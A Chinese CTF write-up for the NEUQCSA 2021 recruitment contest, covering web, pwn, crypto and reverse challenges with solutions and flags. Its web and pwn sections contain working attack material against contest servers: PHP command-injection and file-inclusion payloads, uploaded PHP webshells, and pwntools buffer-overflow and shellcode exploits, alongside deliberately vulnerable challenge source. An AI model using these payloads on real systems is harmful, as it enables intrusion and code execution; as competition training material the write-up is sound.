NEUQCSA-CTF-2021–》东北大学秦皇岛分校2021招新赛

web题好多不会做,我真是太菜了

已完成题目记录

(Web)easy_eval

271

http://2021summer.inhann.top:50001/ 加了点拦截的eval。。

payload

1
2
http://2021summer.inhann.top:50001/?id=var_dump(passthru(%22ls%20/%22));
http://2021summer.inhann.top:50001/?id=var_dump(passthru(%22cat%20/flaGGggGg.txt%22));

flag

1
flag{0cc175b9c0f12fd62f2e39dfbtahfa}

(Crypto)Checkin

100

简单的签到…

1
2
3
4
5
6
7
8
9
10
11
12
13
cipher.txt
7=28L(@(/*_FO<?_H?o#~%0Hb=`PN







hint:Rest Of Time is 47 seconds
-------------------------------
hint.txt
Rest Of Time is 47 seconds

360截图1789123170102114

flag

1
flag{WoW^Y0u~kn0wn@ROT_w3l1!}

(Misc)签到

100

来都来了,签个到吧。 flag{http://neuqcsa.cn/}

flag

1
flag{http://neuqcsa.cn/}

(Web)easy_include

676

http://2021summer.inhann.top:50004/ 白给的文件包含。。。

既然有phpinfo就利用一下

360截图17571115101131100

源码

1
2
3
4
5
6
7
8
9
10
<?php
show_source(__FILE__);
//flag in /flag.php
if(isset($_GET["phpinfo"])){
    phpinfo();
}
if(isset($_GET["file"])){
    if(preg_match("/filter/",$_GET["file"])){die("no filter!!");}
    include $_GET["file"];
}

构造payload

360截图1686070596121115

1
2
3
4
5
6
7
8
9
10
11
12
POST /?file=PHP://input HTTP/1.1
Host: 2021summer.inhann.top:50004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 31

<?php system('cat /flag.php')?>

flag

1
flag{3582e2cd8e53c1e0be913593}

(REVERSE)白给のREVERSE

100

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/re/easy 获取

360截图17571113384262

1
flag{asertfhaiaugYukdfg}

(Web)easy_ping

775

http://2021summer.inhann.top:50003/ 加了点拦截的 ping 。。。

payload1

1
view-source:http://2021summer.inhann.top:50003/?ip=127.0.0.1;ls$IFS$1/

360截图16240204559580

payload2

1
http://2021summer.inhann.top:50003/?ip=127.0.0.1;cat$IFS$1/flag.txt

flag

1
flag{3582efdc7ae760fa3fccbe41493}

(Pwn)ret2backdoor

856

easyeasyeasy nc 39.105.97.11 7777

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/ret2backdoor 获取

360截图18720121382976

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
#p = process('./pwn0')
p = remote("39.105.97.11","7777")

system = 0x401176

payload = b'a' * (0x20+8) + p64(system)

p.sendline(payload)

p.interactive()

360截图16860706599887

flag

1
flag{KhvwDcB0Hw9s9jF9Ld6v9LWSyAFVXY3k}

(Pwn)shellcode

991

nc 39.105.97.11 9998

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/shellcode 获取

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *

p = remote("39.105.97.11","9998")
context(os='linux', arch='amd64',log_level='debug')

p.recvuntil("Your buf is here: ")
aa = p.recvuntil("\n")
print(aa)

shellcode_address_at_stack = int(aa,16)
p.recvuntil("Do you know shellcode?")

print(shellcode_address_at_stack)

shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
len_shellcode = len(shellcode)
print("Shellcode Len:", len_shellcode)

payload = shellcode
payload += '\x90'*(0x50+8-len_shellcode)
payload += p64(shellcode_address_at_stack,endianness="little").decode("iso-8859-1")
p.sendline(payload)

p.interactive()

360截图17290505779898

1
flag{7eDuZYbxRjSiVrxH94gWAiiBG2RT8GIB}

(Pwn)float

964

nc 39.105.97.11 8888

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/float 获取

找到1.15为0x3FF2666666666666

360截图18430701105117101

payload

1
2
3
4
5
6
7
8
9
10
from pwn import *

p = remote("39.105.97.11","8888")
context(os='linux', arch='amd64',log_level='debug')

p.recvuntil("Hello!")
payload1 =p64(0x3FF2666666666666)
p.sendline(payload1)

p.interactive()

360截图17420916191154

flag

1
flag{le5yLrvOMKXFvTmY4wLPh8qmQziHFO77}

(Web)upload

919

http://2021summer.inhann.top:50005/ 文件上传罢了。。

条件竞争

brupsuite 50线程 发包3000次

1、创建php

找flag文件名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST / HTTP/1.1
Host: 2021summer.inhann.top:50005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------210240916733958477573739493108
Content-Length: 229
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------210240916733958477573739493108
Content-Disposition: form-data; name="file"; filename="tt.php"
Content-Type: text/plain

<?php
system("ls /");

-----------------------------210240916733958477573739493108--

获取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST / HTTP/1.1
Host: 2021summer.inhann.top:50005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------210240916733958477573739493108
Content-Length: 229
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------210240916733958477573739493108
Content-Disposition: form-data; name="file"; filename="tt.php"
Content-Type: text/plain

<?php
system("cat /flag.txt");

-----------------------------210240916733958477573739493108--

360截图175711126610282

2、访问

1
2
3
4
5
6
7
8
9
10
POST /upload/tt.php HTTP/1.1
Host: 2021summer.inhann.top:50005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data
Content-Length: 229
Connection: close
Upgrade-Insecure-Requests: 1

360截图17571120448245

flag

1
flag{46c48d2a0055f4bde571b75fupload}

(REVERSE)口算题卡

991

nc 39.105.97.11 9990

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/re/kousuan 获取

payload1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
import time


def run():
  p = remote("39.105.97.11", "9990")
  context(os='linux', arch='amd64', log_level = 'error')
  pwnlib.timeout.Timeout(timeout=None)
  p.recvuntil("come true.".encode('gbk'))
  for i in range(1000):
   try:
    ax = p.recv()
    
    if i > 998:
      print("recv:", ax)
    ax = ax.decode("iso-8859-1").replace("\n", "").replace("=", "").replace("?", "")
    ans = eval(ax)
    #print("ax:", ax, "ans:", ans)
    p.sendline(str(ans).encode('gbk'))
    print("At {}".format(i))
   except pwnlib.exception.PwnlibException as e:
     print(e)

  p.interactive()
  while True:
    pass

run()
while True:
 try:
   run()
 except:
   pass

捕获

不完整flag

1
flag{DyhwRRkSD7gvrgCz7AwFYgrTbtI

看了程序确实是32个字符没错,这个应该是read函数

360截图18180712599491

找到了这里

360截图16751029609548

然后不知道咋写了,python咋转str为int64呀

emmmmm,加}就可以了,亏我还写了程序(下面程序无用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import itertools as its
import libnum

in_= 'flag{DyhwRRkSD7gvrgCz7AwFYgrTbtI' #input()

words = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!#$%^&*}'  # 涉及到生成密码的参数
def gen_passwd(min_len, max_len, words):#参数:最小长度,最大长度,字符组
    while True:
        pwds = its.product(words, repeat=min_len)
        for pwd in pwds:
            yield ''.join(pwd)
        min_len += 1
        if min_len > max_len:
          break



password = gen_passwd(1, 5, words)
count = 0
while True:
  p = next(password)
  in__ = ''
  in__ = in_ + p
  num = libnum.s2n(in__)
  if num & 0x80000000 == 0:
    print(in__)
    break
  count += 1
  if count % 100000 == 0:
    print("At:", count, 'pass:', in__, "num:", num)

flag如下

1
flag{DyhwRRkSD7gvrgCz7AwFYgrTbtI}

(Crypto)where_is_my_flag

676

Try to find your flag….

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/crt/where_is_my_flag.rar 获取

payload1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import gmpy2


p=gmpy2.mpz(0xbdb8699374e4def5d3f3463e772ee20c08e1315c58bc3a762bd7df0eaa2df1411f60b76af536d98dea06f9baf1ba8e4e0e6e9e82f77128301b9402c1c3f8295f11e4334579f5c4c1349a7e1f979600ea203c1ecce035af549d29a42f3088504c09b3074e8680c2ef7b1a1076ac5f247faf539e8999bd21b89d5ab0010dd582db)
q=gmpy2.mpz(0x99c730753f5aa2a326e24c71b784351365a3f121b014879bbb218b70d6c295c549fff979a486693950b67895d8fee4bb3f3037f3c1998db33f80c4eda9a30573aa37eeb7987b7dc8ce6142b9f763006a6e70dc6e58a3848bfe127c987562aaf126ff6c9619f98242fe25018c94d35290131d77ef41be72231dbd394455ca8427)
e=gmpy2.mpz(0x10001)
N=p*q
c= 0x690b7f4160011cd6ece55fd1fbf90e29c20c0c9d9528235ad986eba900cc5c30db3cb17fb99ecf0bf2a365cd3ae0e1e100e40d584ed0ff960ef8f489c8698da70718f72c96ec71acb388d232af1da54995f681ffe05440788569368a48970edfe2ef3b27dedb2c0ee2cac7d0820f58a9a26a4a33a7a1f09a1f3898589ff74ff14e4ba9e126e94fb8dbf2f8b26146924858dada87f490822226d498a55c92864eca2d0e50111d8dbff0544c5d3cffc2341737abe3897b12d1834b2a0ab3c94d1cb2e9300cdc9559a5fae7d1a5f33cd08605eb2476d775cf9faadb032de0b057d08e0b686d022e880917c844fdd19b22881a946540ca90bfc235dafb98f15e8899
pn=(p-1)*(q-1)
d=gmpy2.invert(e,pn)
print(d)

m = pow(c, d, N)


print(hex(m))

360截图17040509082943

payload2

1
2
3
import libnum
n=0xcfbafd2a3dacd5caa9faf7fa8ddfcdf8d3aa5e09b29d99b00278634bb7bb8ad3350a88d5b394c1382fa48b62f5a06382617c580a7148889c5950f0b754cda35b7dbe1c3919fc74f59c97ea2e9847dead3467dcb5853a1e64b88753403df4c8f043bad4053f9a84d9ff97cc819fd740c21fe402cc7eb602209521509257b3146d666c61677b68345f683421473074406368347dcbe8db7314e21cdfbd78496e48539f7e940ec78a239c57ff685d24a669a640e47eabbec89ab3c6475e31cf64d04436caacdce7630d122c50dc1fc2effe603fb5 #上面输出的16进制
print(libnum.n2s(n))

0无标题

再解码一下

360截图17241117243960

1
flag{h4_h4!G0t@ch4}

(REVERSE)简单的逆向

919

很简单的哦

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/re/reverse1 获取

payload

注释可以删掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
test = [
    0x03, 0x1D, 0x24, 0x1C, 0x06, 0x1A, 0x3C, 0x3F, 0x04, 0x32, 
  0x3E, 0x11, 0x1C, 0x0B, 0x0D, 0x1F, 0xFD, 0x09, 0xF3, 0xFB, 
  0x98, 0x92,0
]
'''
tar = [
    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0
]
'''

'''
for i in test:
    print(i)
print('------------------')
for i in range(22):
    test[i] ^= test[i+1]
'''
for i in range(21, -1, -1):
    test[i] ^= test[i+1]

'''
for j in range(22):
    test[j] += test[j+1]
'''
for j in range(21, -1, -1):
    test[j] -= test[j+1]

'''
for j in range(22):
    test[j] += j
'''
for i in range(0, 22):
    test[i] -= i

for i in test:
    #print(i)
    #continue
    if i > 256:
      print(chr(i - 256))
    elif i>=0 and i <= 256:
      print(chr(i))
    elif i < -256:
      print(chr(256+256+i)) 
    else:
      print(chr(256+i))


'''
def enc(a_list):
  for i in range(22):
    a_list[i] += i
  for j in range(22):
    a_list[j] += a_list[j+1]
  for k in range(22):
    a_list[k] ^= a_list[k+1]
  print(a_list)
'''
#enc(test)

360截图16571220118102145

1
flag{qweaxcdgsafdqwfd}

(Crypto)RSA_equation

775

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/crt/RSA_equation.rar 获取

payload1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import gmpy2


from Crypto.Util.number import long_to_bytes
p_2=gmpy2.mpz(0x15554bf3279b5a5ff3a6f51348840a5c77f85d649ef89fe6f6aecca3b7a4f8954d94c041b9bf9c53605e69bf381df6b1e264dbe7cf3760d816bca53bc783efd62)+gmpy2.mpz(0x277f7e82a74a5d8142ffc15b6a580535a1b64d6e4e200918902ca748abaeebaaa08b56883c6d76ebb3a53e4461cb51629b7297af887a72cdcf57f7dc77896968)
q_2=gmpy2.mpz(0x15554bf3279b5a5ff3a6f51348840a5c77f85d649ef89fe6f6aecca3b7a4f8954d94c041b9bf9c53605e69bf381df6b1e264dbe7cf3760d816bca53bc783efd62)-gmpy2.mpz(0x277f7e82a74a5d8142ffc15b6a580535a1b64d6e4e200918902ca748abaeebaaa08b56883c6d76ebb3a53e4461cb51629b7297af887a72cdcf57f7dc77896968)

p = p_2//2 #两个//是相除取最小整数
q = q_2//2


e=gmpy2.mpz(0x10001)
N=p*q
c= gmpy2.mpz(0x545040e44624d0b2ef5dd3e389d7e3edcd0933791f7ccce390d7c8637dd7d26d5d14ecada079d839d71f6326259e9fb65e89c8a52419ed2ffee953c78f5d66335c4cadbc2c48034430a7d3ce4c468eb17c4f04cddfe271928b794048a4a59478c4261c44e7c3e8f9fd946d48620c0069a9327cb22a4c0502d1e9869991c4b922)
pn=(p-1)*(q-1)

print(p)
print(q)
print(N)
print('pqN-----------END')
d=gmpy2.invert(e,pn)
print(d)

m = pow(c, d, N)


print(hex(m))

360截图18430703111107126

payload2

1
2
3
import libnum
n=0x666c61677b3371753474316f6e5f31734024696d706c3321217d #上面输出的16进制
print(libnum.n2s(n))

360截图17340906697581

1
flag{3qu4t1on_1s@$impl3!!}

360截图1798010676114106

(Crypto)RSA_equation_revenge

964

Another equation to solve…

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/crt/RSA_equation_revenge.rar 获取

1
利用(p-1)(q-1)=pq-p-q+1

payload1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import gmpy2


p_add_q = gmpy2.mpz(267250288454671020661183002864902079825043927948084290018881840749593744112726102797024780930797632709553108642750613400441660075135953435838879572761149456222440690951092454409936578252836007774319573115773705552877746875261145722418936676843582728011234303760521211480177882717639401447544081327143079896120)
e=65537
N=gmpy2.mpz(16917955357177705838022522227269189799965442955600174230088241413537748036079610427667748524760416412487661588166675433898394627618977795412467578931925290358440662780942041112815203687805808800979128075090221137838151372846654787093946656482304031633775358207228010135390832522575861986102844835573116079075374771222923318301544600822685589433165393483870570768619713138725020836976344994143665005213595439734053715247430701190483139697651308683944225607919788529538100719847326451607419315958484481451634531624954226369336218518430937719669057217473641902380243356961565889376657557909528540953750939711249576195159)



c=5556174183094477266451814135598079847549101214607407493539824119455757033446976990042962516935280719453306508436587735802442820646417947364018203517042867867234303222841927154859105937645608430659139623801595899283410063126536085399147208144097197880122970573526524116735044315018453029904516767525608508679020577616271754886842387942346107665596391743557339734244348287686755256712318046694093530306203491446373883714768977770886274094556846171675194528687326913219088784425334478253460076116644849541623671796578618297488203818462587973285321935678023132310392911491050341349681920275418686930590504234068089136064

pn=N-p_add_q+1

d=gmpy2.invert(e,pn)
print(d)

m = pow(c, d, N)


print(hex(m))

payload2

1
2
3
import libnum
n=0x666c61677b345f6c6974746c33406269747e643166663163756c745e337175347469306e217d #上面输出的16进制
print(libnum.n2s(n))

360截图176807318288107

flag到手

1
flag{4_littl3@bit~d1ff1cult^3qu4ti0n!}

未完成题目记录

Pwn

canary

992

do you know canary? nc 39.105.97.11 9999

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/canary 获取

没整出来,接下来不知道咋整了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *



p = remote("39.105.97.11","9999")
context(os='linux', arch='amd64',log_level='debug')

payload1 = 'a'*(40)
p.sendlineafter("Welcome to NEUQCSA. What's your name?", payload1)

p.recvuntil(payload1+'\n')
#a0 = p.recvuntil('\\')
#print(a0)
aa = p.recv(8)


print(aa)
print(p.recv())

canary = u64(aa)#-0xa
print("Recv canary:", canary, hex(canary))

bin_sh_addr = 0X4011D6
ret_addr = 0X40101a

payload2 = b'a'*(40)+p64(canary)#+b'a'*8+p64(ret_addr)+p64(bin_sh_addr)
p.sendline(payload2)
p.interactive()

1000

nc 39.105.97.11 6666

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/linklist.zip 获取

civilization

1000

好好保护您的国民,您将名垂千古。 nc 39.105.97.11 999710:30 附件已更新

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/civilization_I_new 获取

cgi_pwn

1000

来自老大哥的web pwnhttp://base.sern.site:8888/cgi-bin/testflag在/flag.txt

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/cgi-pwn.zip 获取

string

1000

nc 39.105.97.11 9991

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/string.zip 获取

pie

1000

这题和canary很像哦 nc 39.105.97.11 9992

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/pwn/pie 获取

Crypto

Toomanye

1000

Quite hard problem. Can u solve it?

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/crt/toomanye.zip 获取

RSA_burp_and_equation

1000

Well u can’t finish it as easy as before…

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/crt/RSA_burp_and_equation.rar 获取

reverse

解方程1

1000

听说有的同学已经开始卷高数了???

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/re/fangcheng1 获取

解方程2

1000

继续解方程吧!

文件可于 本站网址/static/post/NEUQCSA-CTF-2021-wp/ext/re/fangcheng2 获取

Web

check_in_sql

424

http://2021summer.inhann.top:50002/index.php 听说你们都已经会sql的基础语法了。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
include "config.php";
if(isset($_GET["sql"])){
  $sql = preg_replace("/select/","",$_GET["sql"]);
  // var_dump($sql);
  $r = mysqli_query($mysqli,$sql."LionTreeNB");
  if($r && $r->num_rows){
    while($row = $r->fetch_assoc()){
      var_dump($row);
    }
  }
}
show_source(__FILE__);

easy_shell

856

It’s easy to get a webshell using php,isn’t it?
visit:http://1.15.145.49:83/index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
?src=1string(41) "uploads/2da5fbe15be136e57fca1b86daa772cf/" <?php
error_reporting(0);
echo "?src=1";
$dir='uploads/';
if (!is_dir($dir)) {
    mkdir($dir,0755);
}
$dir = "uploads/".md5($_SERVER['REMOTE_ADDR']).'/';
var_dump($dir);
if (!is_dir($dir)) {
    mkdir($dir,0755);
}

$content = '<?php exit; ?>';
$content .= $_POST['txt'];
$prefix=$_POST['prefix'];
$name=$_POST['name'];
if(strpos('./',$prefix) or strpos('./',$name)){
    die("?");
}
$filename=$prefix.$dir.$name;
file_put_contents($filename, $content);

if (isset($_GET['src']))
{
highlight_file(__FILE__);
}

//flag is in /flag
?>

calc again

1000

http://47.94.140.22:8000/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
    $str = $_GET['num'];
    $blacklist = ['[a-z]', "'", '"', '`', '\[', '\]','\^', ',','~','&','\|','\$',';'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/im', $str)) {
            die("what are you want to do?");
        }
    }
    @eval('echo '.$str.';');
}
?>

fat free again and again

1000

http://47.94.140.22:8001/新生可以跳过

1
2
fatfree again and again!
Still /?flag=

全新OJ上线辣

1000

*http://base.sern.site:8889后台会审计流量, 恶意破坏题目环境会取消资格

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
全新OJ上线辣
是时候测试一下你们的python实力了. 这是我从某学校嫖来的oj判题系统.
在下面提交你的python脚本, 系统会判断你的脚本是否达到要求
例题
要求
从标准输入接受一个输入x, 输出x+1
答案
x=input()
print(int(x)+1)
题目
从标准输入接受一个小于100000的输入x, 判断x是否为两个素数的乘积, 是输出1, 否输出0 (没错, 就是保证rsa安全的核心(手动滑稽))
样例输入
49
样例输出
1
在下面输入你的代码